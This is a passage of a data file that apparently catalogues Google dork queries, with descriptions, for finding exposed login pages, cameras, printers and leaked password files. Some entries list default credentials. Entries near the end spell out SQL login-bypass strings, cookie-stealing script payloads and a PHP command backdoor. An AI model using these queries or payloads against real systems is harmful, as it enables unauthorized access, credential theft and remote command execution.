inurl:login.pl", "id": 966}, {"short description": "intitle:\"Document title goes here\" intitle:\"used by web search tools\" \" example of a simple Home Page\"", "long description": "IBM Http Server (AS/400)", "submited": "2005-05-02", "request": "intitle:\"Document title goes here\" intitle:\"used by web search tools\" \" example of a simple Home Page\"", "id": 967}, {"short description": "intitle:\"WorldClient\" intext:\" (2003|2004) Alt-N Technologies.\"", "long description": "MDaemon , Windows-based email server software, contains full mail server functionality and control with a strong emphasis on security to protect your email communication needs.", "submited": "2005-05-02", "request": "intitle:\"WorldClient\" intext:\" (2003|2004) Alt-N Technologies.\"", "id": 968}, {"short description": "intitle:\"Freifunk.Net - Status\" -site:commando.de", "long description": "Hacked WRT54G Freifunk firmware. The router is based on Linux so after the GPL the source code must be published. some guys from freifunk.net have modified it for their needs.", "submited": "2005-05-02", "request": "intitle:\"Freifunk.Net - Status\" -site:commando.de", "id": 969}, {"short description": "intitle:index.of WEB-INF", "long description": "Finds java powered web servers which have indexing enabled on their config directory", "submited": "2005-05-02", "request": "intitle:index.of WEB-INF", "id": 970}, {"short description": "inurl:\"port_255\" -htm", "long description": "Another way to dig up some not yet dorked Lexmark and a couple of Dell printers.http://johnny.ihackstuff.com/index.php?name=PNphpBB2&amp;file=viewtopic&amp;t=2177", "submited": "2005-05-02", "request": "inurl:\"port_255\" -htm", "id": 971}, {"short description": "intitle:\"SWW link\" \"Please wait.....\"", "long description": "Zyxel Zywall", "submited": "2005-05-02", "request": "intitle:\"SWW link\" \"Please wait.....\"", "id": 972}, {"short description": "intitle:\"InterJak Web Manager\"", "long description": "A router device by Uroam (formerly FilaNet), with email and VPN possibilities.", "submited": "2005-05-20", "request": "intitle:\"InterJak Web Manager\"", "id": 973}, {"short description": "inurl:server.cfg  rcon password", "long description": "Counter strike rcon passwords, saved in the server.cfg.", "submited": "2005-05-06", "request": "inurl:server.cfg  rcon password", "id": 974}, {"short description": "intitle:\"myBloggie 2.1.1..2 - by myWebland\"", "long description": "myBloggie is affected by multiple vulnerabilities. http://www.securityfocus.com/bid/13507", "submited": "2005-05-07", "request": "intitle:\"myBloggie 2.1.1..2 - by myWebland\"", "id": 975}, {"short description": "intext:\"powered by EZGuestbook\"", "long description": "HTMLJunction EZGuestbook is prone to a database disclosure vulnerability. Remote users may download the database http://www.securityfocus.com/bid/13543/info/", "submited": "2005-05-11", "request": "intext:\"powered by EZGuestbook\"", "id": 976}, {"short description": "inurl::2082/frontend -demo", "long description": "This allows you access to CPanel login dialogues/screens.", "submited": "2005-05-11", "request": "inurl::2082/frontend -demo", "id": 977}, {"short description": "intitle:\"osTicket :: Support Ticket System\"", "long description": "osTicket is a widely-used open source support ticket system. It is a lightweight support ticket tool written mainly using PHP scripting language. There are several vulnerabilities in the osTicket software that may allow for an attacker to take control of the affected web server, disclose sensitive data from the database, or read arbitrary files. These issues have been reported to the developers and a new updated version of osTicket is available for download. All affected users should upgrade their osTicket installations immediately.http://www.addict3d.org/index.php?page=viewarticle&amp;type=security&amp;ID=3882", "submited": "2005-05-14", "request": "intitle:\"osTicket :: Support Ticket System\"", "id": 978}, {"short description": "intext:\"Powered by: Adobe PrintGear\" inurl:admin", "long description": "Printers equipped with Adobe's PrintGear technologyAdobe's PrintGear technology is a new printing architecture designed specifically for low-cost, high-quality output. At the core of this architecture is a custom chip, the PrintGear Imaging Processor (or PrintGear processor for short). This processor supplies the performance required for high-resolution output, yet helps keep the overall cost of the output device low.", "submited": "2005-05-14", "request": "intext:\"Powered by: Adobe PrintGear\" inurl:admin", "id": 979}, {"short description": "intitle:\"--- VIDEO WEB SERVER ---\" intext:\"Video Web Server\" \"Any time &amp; Any where\" username password", "long description": "AVTech Video Web Server is a surveillance producted that is directly connected to the internet It could enable the AVTech DVR series products or any camera to connect to Internet for remote monitoring or remote control. Besides, it could also enable 2 video input to connect to Internet for remote monitoring and recording. Besides the web interface it also offers an ftp server.", "submited": "2005-05-14", "request": "intitle:\"--- VIDEO WEB SERVER ---\" intext:\"Video Web Server\" \"Any time &amp; Any where\" username password", "id": 980}, {"short description": "inurl:start.htm?scrw=", "long description": "VPON (Video Picture On Net) is a video surveillance setup which seems to be used by a lot of businesses.  In the FAQ posted on their site (http://www.aegismicro.com/navigation/indexsuppfaq.htm) they show a default username/password of webmonitor/oyo.=)", "submited": "2005-05-14", "request": "inurl:start.htm?scrw=", "id": 981}, {"short description": "intitle:\"Welcome to 602LAN SUITE *\"", "long description": "The 602LAN SUITE runs on a webserver called WEB602/1.04 and includes webmail.", "submited": "2005-05-20", "request": "intitle:\"Welcome to 602LAN SUITE *\"", "id": 982}, {"short description": "inurl:sphpblog intext:\"Powered by Simple PHP Blog 0.4.0\"", "long description": "simple PHP Blog is vulnerable to mutiple attacks:Vulnerabilities:~~~~~~~~~~~~~~~~A. Full Path disclosuresB. XSS in search.phpC. Critical Information dislosures http://www.securityfocus.com/archive/1/395994", "submited": "2005-05-30", "request": "inurl:sphpblog intext:\"Powered by Simple PHP Blog 0.4.0\"", "id": 983}, {"short description": "intitle:\"SSHVnc Applet\"OR intitle:\"SSHTerm Applet\" -uni-klu.ac.at -net/viewcvs.py -iphoting.iphoting.com", "long description": "sSHTerm Applet en SSHVnc Applet pages.", "submited": "2005-05-20", "request": "intitle:\"SSHVnc Applet\"OR intitle:\"SSHTerm Applet\"", "id": 984}, {"short description": "\"To view the Web interface of the SpeedTouch, JavaScript must be supported and enabled on your browser!\" -site:webblernet.nl -site:ihackstuff.com -sit", "long description": "speedtouch 510 DSL modem devices that were once unprotected. That may have changed by now.", "submited": "2005-05-20", "request": "\"To view the Web interface of the SpeedTouch, Java", "id": 985}, {"short description": "(intitle:\"502 Proxy Error\")|(intitle:\"503 Proxy Error\") \"The proxy server could not handle the request\" -topic -mail -4suite -list -site:geocrawler.co", "long description": "A reverse proxy is a gateway for servers, and enables one web server to provide content from another transparently. These are often implemented to improve security or performance.", "submited": "2005-05-30", "request": "(intitle:\"502 Proxy Error\")|(intitle:\"503 Proxy Error\") \"The proxy server could not handle the request\" -topic -mail -4suite -list -site:geocrawler.co", "id": 986}, {"short description": "intitle:\"Dell *\" inurl:port_0", "long description": "oA few Online Dell Printers, status, paper, toner levels, ips macs, the usual.. (Lexmark and Dell seem to share the same embedded webserver it seems, try changing the vendor name.)", "submited": "2005-05-31", "request": "intitle:\"Dell *\" inurl:port_0", "id": 987}, {"short description": "intext:\"powered by Hosting Controller\" intitle:Hosting.Controller", "long description": "Description:==============Hosting Controller is a complete array of Web hosting automation tools for the Windows Server family platform. It is the only multilingual software package you need to put your Web hosting business on autopilot.The HC has its own complete billing solution which is tightly integrated within Control Panel &amp; does all the invoicing &amp; billing.Vuln:======A remote authenticated user can invoke 'resellerdefaults.asp' to view reseller add-on plans and then load the following type of URL to view the details of a target reseller's plans:The 'resellerresources.asp' script does not properly validate user-supplied input in the 'resourceid' parameter. A remote authenticated user can supply specially crafted parameter values to execute SQL commands on the underlying database. This can be exploited, for example, to delete a reseller add-on plan.More on Vuln/Exploit====================http://securitytracker.com/alerts/2005/May/1014071.html", "submited": "2005-05-29", "request": "intext:\"powered by Hosting Controller\" intitle:Hosting.Controller", "id": 988}, {"short description": "intitle:\"PacketShaper Customer Login\"", "long description": "PacketShaper Login.Provides login access for PacketShaper Customers.", "submited": "2005-05-19", "request": "intitle:\"PacketShaper Customer Login\"", "id": 989}, {"short description": "( intitle:\"PacketShaper Login\")|(intitle:\"PacketShaper Customer Login\")", "long description": "Packeteer's PacketShaper is an application traffic management system that monitors, controls, and accelerates application performance over the WAN Internet.", "submited": "2005-05-20", "request": "( intitle:\"PacketShaper Login\")|(intitle:\"PacketShaper Customer Login\")", "id": 990}, {"short description": "inurl:Citrix/MetaFrame/default/default.aspx", "long description": "MetaFrame Presentation Server", "submited": "2005-05-15", "request": "inurl:Citrix/MetaFrame/default/default.aspx", "id": 991}, {"short description": "inurl:exchweb/bin/auth/owalogon.asp", "long description": "Outlook Web Access Login POrtal", "submited": "2005-05-15", "request": "inurl:exchweb/bin/auth/owalogon.asp", "id": 992}, {"short description": "inurl:/SUSAdmin intitle:\"Microsoft Software Update Services\"", "long description": "Microsoft SUS Server is a Patch Management Tool for Windows 2000, XP and 2003 systems.It can be used to gain access to a Patch Deployment server. If you successfully login to that server you can possibly compromise all the other network servers.", "submited": "2005-05-23", "request": "inurl:/SUSAdmin intitle:\"Microsoft Software Update Services\"", "id": 993}, {"short description": "intitle:\"Netopia Router (*.)\"\"to view this site\"", "long description": "Web admin for netopia routersThis Web tool provides access to information about the current status of your router and connections.", "submited": "2005-06-03", "request": "intitle:\"Netopia Router (*.)\"\"to view this site\"", "id": 994}, {"short description": "intitle:\"VisNetic WebMail\" inurl:\"/mail/\"", "long description": "VisNetic WebMail is a built-in web mail server that allows VisNetic Mail Server account holders to access their email messages, folders and address books from any standard web browser on an Internet enabled computer.", "submited": "2005-06-06", "request": "intitle:\"VisNetic WebMail\" inurl:\"/mail/\"", "id": 995}, {"short description": "inurl:perform.ini filetype:ini", "long description": "mIRC Passwords For Nicks &amp; Channels in channel\\[chanfolder] section of mirc.ini you can find 2 type of \"private\" information - secret channels (that is +ps is not listed everythere) and password protected channels - passwords stored in plaintext)", "submited": "2005-06-06", "request": "inurl:perform.ini filetype:ini", "id": 996}, {"short description": "(cam1java)|(cam2java)|(cam3java)|(cam4java)|(cam5java)|(cam6java) -navy.mil -backflip -power.ne.jp", "long description": "Kpix Java Based Traffic Cameras. Based at CBS broadcasting for  San Fransisco, Oakland, and San Jose.", "submited": "2005-06-01", "request": "(cam1java)|(cam2java)|(cam3java)|(cam4java)|(cam5java)|(cam6java) -navy.mil -backflip -power.ne.jp", "id": 997}, {"short description": "allintitle:\"Welcome to the Cyclades\"", "long description": "This search reveals the login page for the Cyclades TS1000 and TS2000 Web Management Service. The Cyclades TS1000 and TS200 devices are Console servers, based on a cut down Linux version. These lovely devices sit on the network with console cables attached to them, so that you then gain access to this device, and then have console access to any of the hosts connected to the console ports. :-)The default username and password for these devices is, root/tslinux.This query currently only returns pages available in Google's cache (but in the future more devices may be returned).", "submited": "2005-06-02", "request": "allintitle:\"Welcome to the Cyclades\"", "id": 998}, {"short description": "intitle:\"XcAuctionLite\" | \"DRIVEN BY XCENT\" Lite inurl:admin", "long description": "This query reveals login pages for the administration of XcAuction and XcClassified Lite..\"XcAuction is a powerful and complete auction package that allows you to add auction capabilities to any web site.\"\"XcClassified allows you to offer free or fee based classified ads to your site visitors. It integrates easily into your existing web site design and offers many features.\"", "submited": "2005-06-07", "request": "intitle:\"XcAuctionLite\" | \"DRIVEN BY XCENT\" Lite inurl:admin", "id": 999}, {"short description": "intext:\"Powered by X-Cart: shopping cart software\" -site:x-cart.com", "long description": "X-Cart (version 4.0.8) has multiple input validation vulnerabilities. There doesn't seem to be any way to search for specific versions of the software with Google. See http://www.securitytracker.com/alerts/2005/May/1014077.html for more information.", "submited": "2005-06-03", "request": "intext:\"Powered by X-Cart: shopping cart software\" -site:x-cart.com", "id": 1000}, {"short description": "intitle:\"PowerDownload\" (\"PowerDownload v3.0.2 \" | \"PowerDownload v3.0.3 \" ) -site:powerscripts.org", "long description": "The PowerDownload program (version 3.0.2 and 3.0.3) contains a serious vulnerability. Vulnerability discovery: SoulBlack - Security Research (http://soulblack.com.ar)Date: 05/31/2005Severity: High. Remote Users Can Execute Arbitrary Code.Affected version: v3.0.2 &amp; v3.0.3vendor: http://www.powerscripts.org/* Fix *Contact the Vendor* References *http://www.soulblack.com.ar/repo/papers/advisory/powerdownload_advisory.txt", "submited": "2005-06-03", "request": "intitle:\"PowerDownload\" (\"PowerDownload v3.0.2 \" | \"PowerDownload v3.0.3 \" ) -site:powerscripts.org", "id": 1001}, {"short description": "intitle:\"PHPstat\" intext:\"Browser\" intext:\"PHPstat setup\"", "long description": "Phpstat shows nice statistical informatino about a website's visitors. Certain versions are also contain vulnerabilities: http://www.soulblack.com.ar/repo/papers/advisory/PhpStat_advisory.txt", "submited": "2005-06-03", "request": "intitle:\"PHPstat\" intext:\"Browser\" intext:\"PHPstat setup\"", "id": 1002}, {"short description": "\"portailphp v1.3\" inurl:\"index.php?affiche\" inurl:\"PortailPHP\" -site:safari-msi.com", "long description": "Vulnerability has been found in parameter \"id\". If this variableAny value it is possible to replace it with a sign ' is transferredSince this parameter is involved in all modules, all of them Are vulnerable.It occurs because of absence of a filtration of parameter id. Exampleshttp://example/index.php?affiche=News&amp;id='[SQL inj]http://example/index.php?affiche=File&amp;id='[SQL inj]http://example/index.php?affiche=Liens&amp;id='[SQL inj]http://example/index.php?affiche=Faq&amp;id='[SQL inj]The conclusionVulnerability is found out in version 1.3, on other versionsDid not check. Probably they too are vulnerable.", "submited": "2005-06-03", "request": "\"portailphp v1.3\" inurl:\"index.php?affiche\" inurl:\"PortailPHP\" -site:safari-msi.com", "id": 1003}, {"short description": "+intext:\"powered by MyBulletinBoard\"", "long description": "MyBB is a powerful, efficient and free forum package developed in PHP and MySQL. There is an SQL Injection Exploit available for MyBulletinBoard (MyBB)", "submited": "2005-06-03", "request": "+intext:\"powered by MyBulletinBoard\"", "id": 1004}, {"short description": "inurl:\"S=320x240\" | inurl:\"S=160x120\" inurl:\"Q=Mobile\"", "long description": "Mobile cameras? Not sure what camera type this is for but they are all from Asia and no password is required to view them.. multiple cams and camera views. The &amp;N=* at the end of the URL changes the language of the camera control links, &amp;N=0 is english.This is a slightly modified version of WarChylde's query, which gives more results.", "submited": "2005-06-07", "request": "inurl:\"S=320x240\" | inurl:\"S=160x120\" inurl:\"Q=Mob", "id": 1005}, {"short description": "inurl:XcCDONTS.asp", "long description": "This query reveals an .asp script which can often be used to send anonymous emails from fake senders. When combined with a proxy, the usefulness of these scripts is obvious!", "submited": "2005-06-07", "request": "inurl:XcCDONTS.asp", "id": 1006}, {"short description": "intext:\"SteamUserPassphrase=\" intext:\"SteamAppUser=\" -\"username\" -\"user\"", "long description": "This will search for usernames and passwords for steam (www.steampowered.com) taken from the SteamApp.cfg file.", "submited": "2005-06-05", "request": "intext:\"SteamUserPassphrase=\" intext:\"SteamAppUser=\" -\"username\" -\"user\"", "id": 1007}, {"short description": "inurl:\"CgiStart?page=\"", "long description": "This search reveals even more Panasonic IP cameras!", "submited": "2005-06-08", "request": "inurl:\"CgiStart?page=\"", "id": 1008}, {"short description": "intext:\"Powered by flatnuke-2.5.3\" +\"Get RSS News\" -demo", "long description": "Description of VulnerabilitiesMultiple vulnerabilities in FlatNuke have been reported, which can be exploited by remote users to trigger denial of service conditions, execute arbitrary PHP code, conduct Cross-Site Scripting attacks and disclose arbitrary images and system information.If the \"/flatnuke/foot_news.php\" script is accessed directly a while() call is made that enters an infinite loop, leading to full CPU utilisation.[..]User-supplied input passed to the \"image\" parameter in the \"thumb.php\" script is not correctly validated. This can be exploited to disclose arbitrary images from external and local resources via directory traversal attacks, or to disclose the installation path.It is also possible to disclose the system path by accessing certain scripts directly or specially formed parameters.", "submited": "2005-06-10", "request": "intext:\"Powered by flatnuke-2.5.3\" +\"Get RSS News\" -demo", "id": 1009}, {"short description": "inurl:pass.dat", "long description": "Accesses passwords mostly in cgibin but not all the timeCan find passwords + usernames (sometimes username), some unecrypted some not", "submited": "2005-06-04", "request": "filetype:dat inurl:pass.dat", "id": 1010}, {"short description": "intext:\"Welcome to\" inurl:\"cp\" intitle:\"H-SPHERE\" inurl:\"begin.html\" -Fee", "long description": "This gives results for hosting plans that don't have associated fees, so anyone can sign up with false information and no credit card details", "submited": "2005-06-05", "request": "intext:\"Welcome to\" inurl:\"cp\" intitle:\"H-SPHERE\" inurl:\"begin.html\" -Fee", "id": 1011}, {"short description": "intitle:\"phpinfo()\" +\"mysql.default_password\" +\"Zend Scripting Language Engine\"", "long description": "This will look throught default phpinfo pages for ones that have a default mysql password.", "submited": "2005-06-05", "request": "intitle:\"phpinfo()\" +\"mysql.default_password\" +\"Zend Scripting Language Engine\"", "id": 1012}, {"short description": "intitle:\"configuration\" inurl:port_0", "long description": "More dell and lexmark printers, The usual things included.", "submited": "2005-06-07", "request": "intitle:\"configuration\" inurl:port_0", "id": 1013}, {"short description": "intitle:\"Dell Laser Printer M5200\" port_0", "long description": "Dell Laser Printer M5200", "submited": "2005-06-07", "request": "intitle:\"Dell Laser Printer M5200\" port_0", "id": 1014}, {"short description": "printers/printman.html", "long description": "some interesting information on printer status including Name, Location, Model, Pagecount, Action, Status. This summary page also presents several printers in one list, and the status logs reveal more sensitive information like email addresses.", "submited": "2005-06-07", "request": "printers/printman.html", "id": 1015}, {"short description": "\"RICOH Network Printer D model-Restore Factory\"", "long description": "Not a whole lot here.", "submited": "2005-06-07", "request": "\"RICOH Network Printer D model-Restore Factory\"", "id": 1016}, {"short description": "intitle:\"GCC WebAdmin\" -gcc.ru", "long description": "All sorts of various printer status information", "submited": "2005-06-08", "request": "intitle:\"GCC WebAdmin\" -gcc.ru", "id": 1017}, {"short description": "intitle:\"XMail Web Administration Interface\" intext:Login intext:password", "long description": "This search will find the Web Administration Interface for servers running XMail.\"XMail is an Internet and intranet mail server featuring an SMTP server, POP3 server, finger server, multiple domains, no need for users to have a real system account, SMTP relay checking\", etc...", "submited": "2005-06-09", "request": "intitle:\"XMail Web Administration Interface\" intext:Login intext:password", "id": 1018}, {"short description": "intitle:\"AXIS 240 Camera Server\" intext:\"server push\" -help", "long description": "This search finds AXIS 240 Camera Servers (as opposed to just the cameras) which can host many cameras, that may not be found in other searches, since they are not necessarily IP based.", "submited": "2005-06-10", "request": "intitle:\"AXIS 240 Camera Server\" intext:\"server push\" -help", "id": 1019}, {"short description": "\"html allowed\" guestbook", "long description": "When this is typed in google it finds websites which have HTML Enabled guestbooks. This is really stupid as users could totally mess up their guestbook by adding commands like  or adding a loop javascript pop-up", "submited": "2005-06-11", "request": "\"html allowed\" guestbook", "id": 1020}, {"short description": "intext:\"Powered By: Snitz Forums 2000 Version 3.4.00..03\"", "long description": "snitz Forum 2000 v 3.4.03 and older is vulnerable to many things including XSS. See http://www.gulftech.org/?node=research&amp;article_id=00012-06162003. This is a sketchy search, finding vulnerable versions 3.4.00-3.4.03. Older versions are vulnerable as well.", "submited": "2005-06-21", "request": "intext:\"Powered By: Snitz Forums 2000 Version 3.4.00..03\"", "id": 1021}, {"short description": "filetype:QBW qbw", "long description": "Quickbooks is software to manage your business's financials. Invoicing, banking, payroll, etc, etc. Its a nice software package but their files (.qbw) are simply password protected in most cases and online programs may be available to remove password protection. SSNs (depending on the company), account numbers of employees for direct deposit, customer lists, etc may be available. This could lead to identity theft, or worse...", "submited": "2005-06-21", "request": "filetype:QBW qbw", "id": 1022}, {"short description": "inurl:cgi-bin inurl:calendar.cfg", "long description": "CGI Calendar (Perl) configuration file reveals information including passwords for the program.", "submited": "2005-06-24", "request": "inurl:cgi-bin inurl:calendar.cfg", "id": 1023}, {"short description": "inurl:\"/login.asp?folder=\" \"Powered by: i-Gallery 3.3\"", "long description": "i-Gallery 3.3 (and possibly older) is vulnerable to many things, including /../ traversals.http://www.packetstormsecurity.org/0506-exploits/igallery33.txt", "submited": "2005-06-24", "request": "inurl:\"/login.asp?folder=\" \"Powered by: i-Gallery 3.3\"", "id": 1024}, {"short description": "intext:\"Calendar Program Copyright 1999 Matt Kruse\" \"Add an event\"", "long description": "This search finds all pages that allow you to add events in Mark Kruse's CalendarScript. This script seems to be VERY vulnerable to HTML injection techniques.", "submited": "2005-06-24", "request": "intext:\"Calendar Program Copyright 1999 Matt Kruse\" \"Add an event\"", "id": 1025}, {"short description": "intitle:\"Login to Cacti\"", "long description": "Cacti is a complete network graphing solution designed to harness the power of RRDTool's data storage and graphing functionality.", "submited": "2005-06-24", "request": "intitle:\"Login to Cacti\"", "id": 1026}, {"short description": "\"set up the administrator user\" inurl:pivot", "long description": "Using this, you can find sites with a Pivot weblog installed but not set up. The default set up screen on Pivot has you create an administrator account, so, using this, you can create an account on someone else's weblog, post, and manage the blog.", "submited": "2005-07-03", "request": "\"set up the administrator user\" inurl:pivot", "id": 1027}, {"short description": "inurl:textpattern/index.php", "long description": "Login portal for textpattern a CMS/Blogger tool.", "submited": "2005-06-09", "request": "inurl:textpattern/index.php", "id": 1028}, {"short description": "tilt intitle:\"Live View / - AXIS\" | inurl:view/view.shtml", "long description": "A small modification to the AXIS camera search - it now returns cameras with pan / tilt, which is much more fun!", "submited": "2005-07-07", "request": "tilt intitle:\"Live View / - AXIS\" | inurl:view/view.shtml", "id": 1029}, {"short description": "\"powered by PhpBB 2.0.15\" -site:phpbb.com", "long description": "Another php vulnerabilty, as seen here http://www.frsirt.com/exploits/20050704.phpbbSecureD.pl.phpphpBB 2.0.15 Viewtopic.PHP Remote Code Execution VulnerabilityThis exploit gives the user all the details about the databaseconnection such as database host, username, password anddatabase name.", "submited": "2005-07-08", "request": "\"powered by PhpBB 2.0.15\" -site:phpbb.com", "id": 1030}, {"short description": "filetype:PS ps", "long description": "PS is for \"postscript\"...which basically means you get the high quality press data for documents. Just run 'adobe distiller' or alike to produce a readable PDF. Found items include complete books as sold on amazon, annual reports and even juicier stuff.", "submited": "2005-07-08", "request": "filetype:PS ps", "id": 1031}, {"short description": "\"You have requested access to a restricted area of our website. Please authenticate yourself to continue.\"", "long description": "BackgroundEasySite is a Content Management System (CMS) build on PHP and MySQL. Many easysite servers still use the default username and password, however all of them have been contacted about this problem.", "submited": "2005-07-20", "request": "\"You have requested access to a restricted area of our website. Please authenticate yourself to continue.\"", "id": 1032}, {"short description": "intitle:\"pictures thumbnails\" site:pictures.sprintpcs.com", "long description": "This search reveals the photo albums taken by Sprint PCS customers. Pictures taken with Sprint's cell phone service can be shared on their website. This search exposes the thumbnail album, only if the user has elected to share the photo album.Nothing like the Paris Hilton pictures, but there are pictures of people drunk at parties, dancing, girlfriens and so on.", "submited": "2005-07-21", "request": "intitle:\"pictures thumbnails\" site:pictures.sprintpcs.com", "id": 1033}, {"short description": "allinurl:cdkey.txt", "long description": "cdkeys", "submited": "2005-07-21", "request": "allinurl:cdkey.txt", "id": 1034}, {"short description": "intitle:\"TANDBERG\" \"This page requires a frame capable browser!\"", "long description": "Tandberg is a manufacturer of videoconferencing A videoconference (also known as a video teleconference) is a meeting among persons where both telephony and closed circuit television technologies are utilized simultaneously.", "submited": "2005-07-22", "request": "intitle:\"TANDBERG\" \"This page requires a frame capable browser!\"", "id": 1035}, {"short description": "intitle:\"Middle frame of Videoconference Management System\" ext:htm", "long description": "Tandberg is a manufacturer of videoconferencing A videoconference (also known as a video teleconference) is a meeting among persons where both telephony and closed circuit television technologies are utilized simultaneously.", "submited": "2005-07-22", "request": "intitle:\"Middle frame of Videoconference Management System\" ext:htm", "id": 1036}, {"short description": "intitle:\"Veo Observer Web Client\"", "long description": "Another online camera search. This one uses ActiveX thingies, so you need a M$ browser. Append \"LGI_en.htm\" to the URL for the english version. The embedded webserver is called Ubicom/1.1. Defaults are admin/password. The manual very cleary warns owners to change that.", "submited": "2005-07-22", "request": "intitle:\"Veo Observer Web Client\"", "id": 1037}, {"short description": "intitle:\"TOPdesk ApplicationServer\"", "long description": "Topdesk is some kind of incident ticket system with a webinterface. It requires: Windows 98 and Windows NT, Windows 2000, Windows XP, OS/2. It installs a webserver called: Jetty/4.2.2 and the default password (operator login) is admin/admin. The HTTP server header reveals the OS it's running on.", "submited": "2005-07-22", "request": "intitle:\"TOPdesk ApplicationServer\"", "id": 1038}, {"short description": "intitle:\"Welcome to Mailtraq WebMail\"", "long description": "Mailtraq WebMail is just another a web-based e-mail client. This is the login page.", "submited": "2005-07-22", "request": "intitle:\"Welcome to Mailtraq WebMail\"", "id": 1039}, {"short description": "intitle:\"Java Applet Page\" inurl:ml", "long description": "Another Standalone Network Camera.Default Login: remove wg_jwebeye.ml to get a nice clue ..Server: wg_httpd/1.0(based Boa/0.92q)", "submited": "2005-07-22", "request": "intitle:\"Java Applet Page\" inurl:ml", "id": 1040}, {"short description": "intitle:\"WEBDVR\" -inurl:product -inurl:demo", "long description": "DVR is a generic name used to describe the recording process with a digital cam (digitial video recording). This search finds several manufactors like Kodicom DVR Systems, i3 DVR, and others I can't identify.", "submited": "2005-07-22", "request": "intitle:\"WEBDVR\" -inurl:product -inurl:demo", "id": 1041}, {"short description": "\"This section is for Administrators only. If you are an administrator then please\"", "long description": "Nothing special, just one more set of login pages, but the \"Administrators only\" line is a classic.", "submited": "2005-07-24", "request": "\"This section is for Administrators only. If you are an administrator then please\"", "id": 1042}, {"short description": "intitle:\"Member Login\" \"NOTE: Your browser must have cookies enabled in order to log into the site.\" ext:php OR ext:cgi", "long description": "Pretty standered login pages, they all have various differences but it appears that they use the same script or software.", "submited": "2005-07-24", "request": "intitle:\"Member Login\" \"NOTE: Your browser must have cookies enabled in order to log into the site.\" ext:php OR ext:cgi", "id": 1043}, {"short description": "site:www.mailinator.com inurl:ShowMail.do", "long description": "Mailinator.com allows people to use temporary email boxes. Read the site, I won't explain here. Anyway, there are emails in this site that have no password protection and potentially contain usernames, passwords, and email data. The only lock against unwanted viewers is the email address which can be randomized.", "submited": "2005-07-24", "request": "site:www.mailinator.com inurl:ShowMail.do", "id": 1044}, {"short description": "filetype:mdb \"standard jet\"", "long description": "These Microsoft Access Database files may contain usernames, passwords or simply prompts for such data.", "submited": "2005-07-26", "request": "filetype:mdb \"standard jet\" (password | username | user | pass)", "id": 1045}, {"short description": "inurl:\"default/login.php\" intitle:\"kerio\"", "long description": "This dork reveals login pages for Kerio Mail server. Kerio MailServer is a state-of-the-art groupware server allowing companies to collaborate via email, shared contacts, shared calendars and tasks. Download can be found here http://www.kerio.com/kms_download.html.", "submited": "2005-07-26", "request": "inurl:\"default/login.php\" intitle:\"kerio\"", "id": 1046}, {"short description": "ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:\"budget approved\") inurl:confidential", "long description": "Although this search is a bit broken (the file extensions don't always work), it reveals interesting-looking documents which may contain potentially confidential information.", "submited": "2005-07-30", "request": "ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:\"budget approved\") inurl:confidential", "id": 1047}, {"short description": "[WFClient] Password= filetype:ica", "long description": "The WinFrame-Client infos needed by users to connect toCitrix Application Servers (e.g. Metaframe).Often linked/stored on Webservers and sometimes reachable from Internet.Password is 16-byte-Hash of unknown encryption (MSCHAPv2 ?).File Extension is \"ica\" the so called Citrix Independent Computing Architecture.These files may contain login information (Username, Password, Domain).", "submited": "2005-07-27", "request": "[WFClient] Password= filetype:ica", "id": 1048}, {"short description": "intitle:\"V1\" \"welcome to phone settings\" password", "long description": "This is a small search for the Italk BB899 Phone Adaptor login page. iTalkBB is a local and long distance calling service provided by iTalk Broadband Corporation. It combines voice and internet networks to provide inbound and outbound long distance and local calling solutions.Depending on the version of firmware preinstalled on your IP Box, the password to get into the setting pages may be either 12345678 or 87654321.", "submited": "2005-08-07", "request": "intitle:\"V1\" \"welcome to phone settings\" password", "id": 1049}, {"short description": "intitle:\"HP ProCurve Switch *\" \"This product requires a frame capable browser.\"", "long description": "HP ProCurve Switch web management pages, found by their [noscript] html tags. Please note: this search only gives results from certain source IP addresses and I can't tell you why (check forum topic number 2609 for details).", "submited": "2005-08-07", "request": "intitle:\"HP ProCurve Switch *\" \"This product requi", "id": 1050}, {"short description": "\"Powered by Gravity Board\"", "long description": "4.22 07/08/2005 Gravity Board X v1.1 (possibly prior versions) Remote code execution, SQL Injection / Login Bypass, cross site scripting, path disclosure poc software: author site: http://www.gravityboardx.com/ a) Sql Injection / Login Bypass: If magic_quotes off, A user can bypass login check and grant administrator privileges on target system: login: ' or isnull(1/0) /* password: whatever b) Cross site scripting poc: b.1)After he login as administrator he can edit template to insert evil javascript code. Try to insert at the end of the template these lines:  alert(document.cookie) b.2)A user can craft a malicious url like this to access target user cookies: http://[target]/[path]/deletethread.php?board_id=\"&gt;alert(document.cookie) c) Remote commands/php code execution: c.1) Always editing the template, attacker can leave a backdoor in target system, example, at the end of template:   After, the attacker can launch commands by this urls: http://[target]/[path]/index.php?cmd=ls%20-la            to list directories... http://[target]/[path]/index.php?cmd=cat%20/etc/passwd to see Unix /etc/passwd file http://[target]/[path]/index.php?cmd=cat%20config.php to see database username/password c.2) An IMPORTANT NOTE: You can edit template without to be logged in as administator, calling editcss.php script, look at the code of this script: if($fp = fopen('gbxfinal.css','w')){ fwrite($fp, $csscontent); fclose($fp); echo ''; }else{ echo 'Gravity Board X was unable to save changes to the CSS template.'; } you can easily deface the forum and/or insert a backdoor calling an url like this: http://[target]/[path]/editcss.php?csscontent= then execute commands: http://[target]/[path]/index?cmd=[command] It's also possible to disclose path: d) path disclosure: http://[target]/[path]/deletethread.php?perm=1 http://[target]/[path]/ban.php http://[target]/[path]/addnews.php http://[target]/[path]/banned.php http://[target]/[path]/boardstats.php http://[target]/[path]/adminform.php http://[target]/[path]/forms/admininfo.php http://[target]/[path]/forms/announcements.php http://[target]/[path]/forms/banform.php ans so on...calling scripts in /forms directory", "submited": "2005-08-07", "request": "\"Powered by Gravity Board\"", "id": 1051}, {"short description": "\"Powered by SilverNews\"", "long description": "silvernews 2.0.3 (possibly previous versions ) SQL Injection / Login Bypass / Remote commands execution / cross site scripting software: author site: http://www.silver-scripts.de/scripts.php?l=en&amp;script=SilverNews SQL Injection / Login bypass: A user can bypass admin password check, if magic_quotes is set to off: user: ' or isnull(1/0) /* pass: whatever remote commands execution: now, new admin can edit template, clicking on Templates -&gt; Global footer, can add the lines: //***********************************************   TEMPLATE; } } system($HTTP_GET_VARS[command]); /* to leave a backdoor in template file /templates/tpl_global.php now can launch system commands on the target system with theese urls: http://[target]/[path]//templates/tpl_global.php?command=ls%20-la to list directories 